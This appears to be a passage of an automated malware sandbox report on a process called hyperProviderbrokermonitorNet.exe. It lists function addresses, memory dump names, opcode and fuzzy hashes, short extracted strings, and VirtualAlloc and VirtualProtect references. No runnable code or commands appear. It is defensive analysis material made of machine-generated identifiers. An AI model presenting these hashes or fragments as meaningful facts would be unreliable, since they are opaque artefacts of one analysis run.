Opcode ID: d1084a4766fe11773d993e9a7346bd28578bcba37a9807a1c63fc8a13c647c8a
Instruction ID: d5dcd0fe48e117bbfd7099a30c1a7449b1939c48bf6b8c1c76fc96dcfa67012b
Opcode Fuzzy Hash: d1084a4766fe11773d993e9a7346bd28578bcba37a9807a1c63fc8a13c647c8a
Instruction Fuzzy Hash: 88012C74A0D7898FE712DB6484941D9BFB0AF02314F1545EAC581DB192DA3C56449741

Function 00007FFD34A69588 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bed23d77ddbd4b4451f65c73d286393d991a2c5858a231ce6910e99e44cc0d14
Instruction ID: cf3c5b8f12e70d193bbd8d3917036ca35d9446bf63152625ce74bbeaf5490272
Opcode Fuzzy Hash: bed23d77ddbd4b4451f65c73d286393d991a2c5858a231ce6910e99e44cc0d14
Instruction Fuzzy Hash: BDF0E260B0E5478EF7252D5091B12F9AA19DF4B329F300536C60FC71C2CD1E68457A91

Function 00007FFD346606AD Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b36287ac54f7b4b2874ee988d3af6978f6d63ffc547ed15a98ae28f7e8caf6d5
Instruction ID: b459a71e9f40ac181e39417d953375e1b2e2d29c77ddb8f4eeb2dd028fb45efa
Opcode Fuzzy Hash: b36287ac54f7b4b2874ee988d3af6978f6d63ffc547ed15a98ae28f7e8caf6d5
Instruction Fuzzy Hash: A8E04F06F5FE7B02E45579AD68F60FD63004FC6634FA50172D70CE00C6ED4E24992266

Function 00007FFD34660845 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f552e159cae33530ebe9a5c5b4b0b1c73f2daa89060f404b0b9fbc0785aadaf
Instruction ID: 24d3ea560c6aa304e8fc9cb83d165e3174fe097275403be659d66ec846606a6a
Opcode Fuzzy Hash: 7f552e159cae33530ebe9a5c5b4b0b1c73f2daa89060f404b0b9fbc0785aadaf
Instruction Fuzzy Hash: B0E0C2257089505FC654BB6DDCA54DE7BA0EF46326B8600B1E18CC6062E608A8ABC391

Function 00007FFD34661F58 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7432e24db60666005816ad4331846237d18def1f0b054c02f6cf81d4733bc59c
Instruction ID: b51ac961bbb6f073cd45990e4c6077caa6e55b6711335d30149b429777706d10
Opcode Fuzzy Hash: 7432e24db60666005816ad4331846237d18def1f0b054c02f6cf81d4733bc59c
Instruction Fuzzy Hash: A7E01220F0943B4BF794EA14C8B17F962559F85320F1400B4D64DE32D1CE2C6D80A700

Function 00007FFD34A63437 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a650256db136d3f8a07282d1cfa2ffb0d57d73cca131885c714e1df7e704fe26
Instruction ID: 546f4730e629f4be3f3eb5f16b424e8ab63dded0032a02b3df477a6e68ab9e8c
Opcode Fuzzy Hash: a650256db136d3f8a07282d1cfa2ffb0d57d73cca131885c714e1df7e704fe26
Instruction Fuzzy Hash: 46D0A782F4E7C65BEB6319B408F50780D809F17754B2601B6DB5ACA3D3DC9C6D066332

Function 00007FFD34A68A9D Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 533c7856a39ea4d4ab03276d4b8f07c600fc089033cdde8ecc145e2945acf5db
Instruction ID: 4d59c5a3e78a433770bf101d89a960729f62023f6b40a1a8683849828a4a4f7a
Opcode Fuzzy Hash: 533c7856a39ea4d4ab03276d4b8f07c600fc089033cdde8ecc145e2945acf5db
Instruction Fuzzy Hash: 10D05E42F0E38746EB61052408B40B808859F273287AA0479C709CA2C3DC9C68046215

Function 00007FFD34660B9D Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e2f21b14d59328ef1b7d7828e20e9a15676930dc036653e79af614fd5a0ecdb
Instruction ID: d821eaff9d1d67265881470e5e1646a14b47d35f5bc5c9ee4614536064d77f5c
Opcode Fuzzy Hash: 2e2f21b14d59328ef1b7d7828e20e9a15676930dc036653e79af614fd5a0ecdb
Instruction Fuzzy Hash: 74C0123062880E8FDA40BB2DC888824BBA0FB4E211BD900E4E00CCB1A2D66998908700

Function 00007FFD34666413 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bdf625511d183e1d125e4780f689d2679b45cdddf8a2460590a4ec3b00ab5d0
Instruction ID: a777dd3382dda22702ec083924f5e9223a8e562baf669cf1a098760c5981effd
Opcode Fuzzy Hash: 9bdf625511d183e1d125e4780f689d2679b45cdddf8a2460590a4ec3b00ab5d0
Instruction Fuzzy Hash: DAD0A704B0D66B0BF229535814752FE1F414F42124F080874E08DEB1A6CC0C190213CA

Function 00007FFD34660B18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74ab9ec2380bb13ddba8309d025815d825ca00bc7cc9cb19f1a28d162cd8ad11
Instruction ID: a9cc446ec8f72c15c9db0022d04b515f8cc15cffb2d6959a2c62dc8cc1d45324
Opcode Fuzzy Hash: 74ab9ec2380bb13ddba8309d025815d825ca00bc7cc9cb19f1a28d162cd8ad11
Instruction Fuzzy Hash: 3FC08C306108088FCA00EB2DC88894432A0FB0E320BC10090E00DC7171E21EEC80C740

Function 00007FFD346625D6 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c4d91e86fcf89f146129f195fc778a9b3cf44a1fdb965a689f83102770e9f36
Instruction ID: d8914accb01e9d13a120b3b9327fec60e3151cc66467bf0d5a7e96d4b9509718
Opcode Fuzzy Hash: 3c4d91e86fcf89f146129f195fc778a9b3cf44a1fdb965a689f83102770e9f36
Instruction Fuzzy Hash: 80D0C914F1896A4BE644AB2481B61FA16819B46320F040879AA0EC73D2DD2C2C412A80

Function 00007FFD34A63F1B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc0320fddf887d4cb9f89a615ede717bb0e45e7e2153b953a923008933622dd8
Instruction ID: 8606500dddf6bb486a0f605556e9e3b5fb396cd81afeca9aee28e4183ad8b3db
Opcode Fuzzy Hash: dc0320fddf887d4cb9f89a615ede717bb0e45e7e2153b953a923008933622dd8
Instruction Fuzzy Hash: 18D0C910B1E6A785F279564141F023961A05F13329E30447ED25FC98C1CD2DBA027705

Function 00007FFD346663CD Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 781527bab367dc17ff5e04a165ea32319fa62a43401fc315a7b22c281533475e
Instruction ID: 11f7e0928c7cd03b29ec6d1fdcc66c17eb135b850e2448b938e5f9f4c4e88d8f
Opcode Fuzzy Hash: 781527bab367dc17ff5e04a165ea32319fa62a43401fc315a7b22c281533475e
Instruction Fuzzy Hash: 67C08C01F08A2F07F228234880303BD04024F40728F540838E04DDA2CACC0C1D0112C7

Function 00007FFD34A66AB5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction ID: 3b95fc050d237073c9f17657125a6ea96654ed2ec262a5298fb58335f727e640
Opcode Fuzzy Hash: 2aedec227b0bf816064b6040577f353a7d62dfd50db72e1254aa9bac1459961c
Instruction Fuzzy Hash: 32C04C303049149FD784DE0DC0D463873D1EF4A301B5000B4E54ACB2B6C52C9C45A710

Function 00007FFD346606D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf5d805de2e92f06ac4483289a5bcde691937bd6aba2715eae8f79235abd674
Instruction ID: 46cd4f5588ac8c5cd54c8f1799faa5b41abfecdc386fc70e30c2e5b8302fcfbc
Opcode Fuzzy Hash: 8cf5d805de2e92f06ac4483289a5bcde691937bd6aba2715eae8f79235abd674
Instruction Fuzzy Hash: 23B01204D7A86F00A40C397B08D20E470505B46128FC41270DB0CC0185D88D14942242

Function 00007FFD34A6DAC3 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2335742776.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34a60000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6073f0337aa33c7a6ec8d08be4d74b9cc3d0df835d4a81f24734d80f07419bc9
Instruction ID: 20ed1ce72f52e4f94256518d560783236e37d4abf5112ded82166acda6969ace
Opcode Fuzzy Hash: 6073f0337aa33c7a6ec8d08be4d74b9cc3d0df835d4a81f24734d80f07419bc9
Instruction Fuzzy Hash: 52B00200F0C24796A66595B408E507C14414B5B2ADBB40535970EE51C2ED9C2850B291

Function 00007FFD34662D4D Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2327250022.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction ID: af598657691767c2e8110a6b5b77218ee4270287afbaa972597fcde8123c2360
Opcode Fuzzy Hash: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction Fuzzy Hash:

Analysis Process: hyperProviderbrokermonitorNet.exePID: 6272, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD346910EA Relevance: 1.8, Strings: 1, Instructions: 527
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`t4, xrefs: 00007FFD346915C5

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: `t4
API String ID: 0-4056057151
Opcode ID: 239a97e12bb6d9d8b8d878402a5247181f20da64c0bbcc4e60d54b750621f2d2
Instruction ID: 01617c5e185c0951bb3864b8352a92f2d25324722c5a9575edf743f1047a94d4
Opcode Fuzzy Hash: 239a97e12bb6d9d8b8d878402a5247181f20da64c0bbcc4e60d54b750621f2d2
Instruction Fuzzy Hash: B8E19931A1D6AA0BF72D9E2848E60F57791EB53315B2843BDCADBC3487DC6C680792C1

Function 00007FFD34660D47 Relevance: 1.6, Strings: 1, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

5Z_H, xrefs: 00007FFD34660DF3

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: 5Z_H
API String ID: 0-3267294416
Opcode ID: a711623dc9653ac9a19ad05eb05b07f5a8c35e5dd346b25cf9aad3bdde4e1516
Instruction ID: 14902be62f5c1c1c60bb589c56ce66566889c50d82b061b0cc7bf3c2f4de8f91
Opcode Fuzzy Hash: a711623dc9653ac9a19ad05eb05b07f5a8c35e5dd346b25cf9aad3bdde4e1516
Instruction Fuzzy Hash: 89B1E871B0DA994FE759DB6888B53E97FE1FB56324F0801BAD089D72E2CA7C1811C741

Function 00007FFD34660E43 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34660000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f421b9e7fae623ff8a6da17488453d2c8a980eed2dc12bd9ddfa79289514e090
Instruction ID: cae1e1975a4bf3143d171266534c388e15ffad73d619e34f7753809508e79648
Opcode Fuzzy Hash: f421b9e7fae623ff8a6da17488453d2c8a980eed2dc12bd9ddfa79289514e090
Instruction Fuzzy Hash: 2D51B0B1B19A598EE798CF58C8A93E9BEE1FB9A324F54017AD04AD3791CAB81411C740

Function 00007FFD34670A06 Relevance: 5.8, Strings: 4, Instructions: 826
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Bp4, xrefs: 00007FFD34670C53
8Iq4, xrefs: 00007FFD34670B51
p\q4, xrefs: 00007FFD346712F8
PXq4, xrefs: 00007FFD34670CCF

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: 8Iq4$Bp4$PXq4$p\q4
API String ID: 0-1725418635
Opcode ID: f6ed4605e8eb15950bcbb5d7ed4e930f63635d40de8d6c24c0374edf0a547447
Instruction ID: 7ad6c179736ce9f0fd01e6765642704f296afba717f7f0e0ad4da64d51432b32
Opcode Fuzzy Hash: f6ed4605e8eb15950bcbb5d7ed4e930f63635d40de8d6c24c0374edf0a547447
Instruction Fuzzy Hash: 4B428271B1896A4BEB98EF1888A56F977D2FF99310F0445BAD04ED3283DD3CAC819741

Function 00007FFD346716F8 Relevance: 5.7, Strings: 4, Instructions: 679
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Bp4, xrefs: 00007FFD34670C53
8Iq4, xrefs: 00007FFD34670B51
p\q4, xrefs: 00007FFD346712F8
PXq4, xrefs: 00007FFD34670CCF

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: 8Iq4$Bp4$PXq4$p\q4
API String ID: 0-1725418635
Opcode ID: 3e4a26ff17e772032f1f3858aefca1c3f2dd4c6f08b940517614ef332856a3b2
Instruction ID: e246376864941381dedbb7d8d5a2d1ad4462f32de14a16e01c37fc5f67f593d4
Opcode Fuzzy Hash: 3e4a26ff17e772032f1f3858aefca1c3f2dd4c6f08b940517614ef332856a3b2
Instruction Fuzzy Hash: C122C461F1895A4BE798EF2888A56F977D1FF99310F0445BAD04ED3283DD3CAC819B41

Function 00007FFD34691C89 Relevance: 2.6, Strings: 2, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xt4, xrefs: 00007FFD34691CF6
M, xrefs: 00007FFD34691CA6

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: M$Xt4
API String ID: 0-1147253894
Opcode ID: f1bdf936ea33eb548141e29302d68a25f6feef6180c3e43b1b7dd6bfdf59f349
Instruction ID: 415bf0ef4e15aaa3083ab41f4a10c57e04a0c41c91fb8635c1a8d167eecda662
Opcode Fuzzy Hash: f1bdf936ea33eb548141e29302d68a25f6feef6180c3e43b1b7dd6bfdf59f349
Instruction Fuzzy Hash: 7711A371A0E7C94FEB169F3448A50E8BFB0EF57210B4901FBD589CB1A3EA2C9845C741

Function 00007FFD34670EC7 Relevance: 1.8, Strings: 1, Instructions: 515
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p\q4, xrefs: 00007FFD346712F8

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: p\q4
API String ID: 0-944575574
Opcode ID: 925578e42cd010ecced0d3070beb225776e22cb718f762b97282426171778701
Instruction ID: c14cbe060643adee144d06dbb3d2d65df50a3d4779092247145c5ee47b820da5
Opcode Fuzzy Hash: 925578e42cd010ecced0d3070beb225776e22cb718f762b97282426171778701
Instruction Fuzzy Hash: A5F1B161F1896A4BE798EF1888A17F977E2FF99310F04417AD54EC7286DD3CAC829740

Function 00007FFD346710A9 Relevance: 1.7, Strings: 1, Instructions: 443
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p\q4, xrefs: 00007FFD346712F8

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: p\q4
API String ID: 0-944575574
Opcode ID: 5079b56c6d43e47d911d53ee531e5793deb677689cc07af895390f06a8a11baa
Instruction ID: ad7e9462f64f7b05c2891528f75af9cc0c1404662e97be1f08f44a25ee6f4879
Opcode Fuzzy Hash: 5079b56c6d43e47d911d53ee531e5793deb677689cc07af895390f06a8a11baa
Instruction Fuzzy Hash: 21E1B231F1892A4BE758EF1888A16F977E2FF99310F14457AD54EC7286DD3CAC429740

Function 00007FFD3466B16A Relevance: 1.6, APIs: 1, Instructions: 144
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFD3466B24D

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34664000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34664000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34664000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 98c6bbebde9047814a4823bcd42fcf522d01e5f9695f14b624617b42fb1a9345
Instruction ID: 1751bf384f6c1a9da53004a4f99b24fa7c02cd645423b7c903423d27eae99408
Opcode Fuzzy Hash: 98c6bbebde9047814a4823bcd42fcf522d01e5f9695f14b624617b42fb1a9345
Instruction Fuzzy Hash: 5A41383190C7988FD71A9BA898566F97FE0EF57721F0442AFD089D3192CE786806C792

Function 00007FFD34693415 Relevance: 1.5, Strings: 1, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@aT4, xrefs: 00007FFD34693498

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: @aT4
API String ID: 0-203836115
Opcode ID: 7310b0d68b85067408f96f924df6a8d4107e06a44d0cf39a73491b08c5b4a650
Instruction ID: 1bd7c46a7647107c03d7c81916b96b545306e7d7852a40e4de8cff1bd40730d3
Opcode Fuzzy Hash: 7310b0d68b85067408f96f924df6a8d4107e06a44d0cf39a73491b08c5b4a650
Instruction Fuzzy Hash: E791D221B1CA5E0FEB98EE5884B62B973D2EFD9314F04447AD54EC7283DD6CAC859381

Function 00007FFD3466C141 Relevance: 1.4, APIs: 1, Instructions: 127
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FFD3466C1F4

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34664000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34664000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34664000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 37dc42ddd506c470cab3de6f5072b436889d549a574b79fa9127a3601b121a2f
Instruction ID: f0cdfa262f58d43fbcfe895f2bf90bd1ecce32a32ce40f764a54a59a1c307309
Opcode Fuzzy Hash: 37dc42ddd506c470cab3de6f5072b436889d549a574b79fa9127a3601b121a2f
Instruction Fuzzy Hash: 01310B31A0CB8C4FDB1DDFA898556F9BBE0EF56321F00427FD049D3152DA64A8158781

Function 00007FFD34697D69 Relevance: 1.3, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD34697D86

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 37d925d055d41864fa7a818f28f51cd1d73ef1f4ba1bdb1a87941e2ab36537de
Instruction ID: 15993f5119ad22bc8a136d74b88a24206df827f4967bca13cc89e2445fd6be30
Opcode Fuzzy Hash: 37d925d055d41864fa7a818f28f51cd1d73ef1f4ba1bdb1a87941e2ab36537de
Instruction Fuzzy Hash: DA21F621A0D6D58FD32A9A2488A5AB57FA0DF57311F0900FFD58AC71D3E95C6C0AC352

Function 00007FFD34673B59 Relevance: 1.3, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD34673B76

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: fdce2d6c734dca1150e438f7f2d48fe85d51389579dd000af8095cb56515b5cb
Instruction ID: 803f2f5521119f04edb62691d6950cbc3bed281273a1b2312dfa04e735cf5fcf
Opcode Fuzzy Hash: fdce2d6c734dca1150e438f7f2d48fe85d51389579dd000af8095cb56515b5cb
Instruction Fuzzy Hash: 8421B070A0D29A8FEB059F748CA55E97FB0AFA3310F0585BAC155CB1A2EA3CA844D741

Function 00007FFD34674529 Relevance: 1.3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD34674546

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34670000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 70f37058706da53d9972ec56535777d366a95f55f5adb9610b92a794a068f9be
Instruction ID: f3d79c197a0e1d62405f6fc4ca9b593f2ff012635702320d3ba97e33b3836349
Opcode Fuzzy Hash: 70f37058706da53d9972ec56535777d366a95f55f5adb9610b92a794a068f9be
Instruction Fuzzy Hash: 4711E621A0D6D44FEB169E3488A96A43FA1AF57310F4A41FBC189CB1E3D91D9C45C311

Function 00007FFD3469A4F9 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD3469A516

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 79252b5be7ef1a9c5291fdf52deff1be888350e85d532e85d2b59cd621f1910b
Instruction ID: b63125c06859f1a9070e08b68161d23e238bb8dca0ada4d11724e4488db098ca
Opcode Fuzzy Hash: 79252b5be7ef1a9c5291fdf52deff1be888350e85d532e85d2b59cd621f1910b
Instruction Fuzzy Hash: 0C11E561A0E7C84FD756AB344C694A9BFB0EF57200B4A41EBD449CB1A3E92CAC49C701

Function 00007FFD3469A429 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

M, xrefs: 00007FFD3469A446

Memory Dump Source

Source File: 00000026.00000002.2500379230.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd34690000_hyperProviderbrokermonitorNet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 7d8dd2006c3f4b7c35b76ca6340f7e076b6ff1c05620edb65307ebe67a603f26
Instruction ID: 0a4289771383d2ff9560dd47824a09c07fa6c7f40d0a7cb43e0e62208d50c0e1
Opcode Fuzzy Hash: 7d8dd2006c3f4b7c35b76ca6340f7e076b6ff1c05620edb65307ebe67a603f26
Instruction Fuzzy Hash: AD018051A0E7D10FD76A6A3448790A47FA0DF57610B0A01EBC189CF5E3E95D9C88C742

